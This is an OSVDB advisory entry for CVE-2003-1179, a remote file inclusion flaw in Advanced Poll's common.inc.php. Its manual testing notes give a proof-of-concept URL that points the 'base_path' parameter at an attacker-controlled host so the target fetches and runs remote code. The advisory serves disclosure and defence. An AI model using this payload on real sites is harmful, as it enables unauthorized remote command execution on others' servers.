Advanced Poll common.inc.php base_path Variable Remote File Inclusion

2003-10-25T09:13:47
ID OSVDB:25172
Type osvdb
Reporter Frog Man(leseulfrog@hotmail.com)
Modified 2003-10-25T09:13:47

Description

Vulnerability Description

Advanced Poll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to common.inc.php not properly sanitizing user input supplied to the 'base_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Advanced Poll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to common.inc.php not properly sanitizing user input supplied to the 'base_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/admin/common.inc.php?base_path=http://[attacker]

References:

Vendor URL: http://www.proxy2.de/scripts.php Secunia Advisory ID:10068 Related OSVDB ID: 2743 Related OSVDB ID: 3292 Related OSVDB ID: 3291 Related OSVDB ID: 25169 Related OSVDB ID: 25170 Related OSVDB ID: 25173 Related OSVDB ID: 25171 Other Advisory URL: http://packetstormsecurity.nl/0310-exploits/php.advanced.poll.txt Other Advisory URL: http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0019.html Other Advisory URL: http://www.phpsecure.info/v2/tutos/frog/AdvancedPoll2.0.2.txt Other Advisory URL: http://www.solpotcrew.org/adv/solpot-adv-02.txt Nessus Plugin ID:11487 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0365.html ISS X-Force ID: 13514 CVE-2003-1179 Bugtraq ID: 8890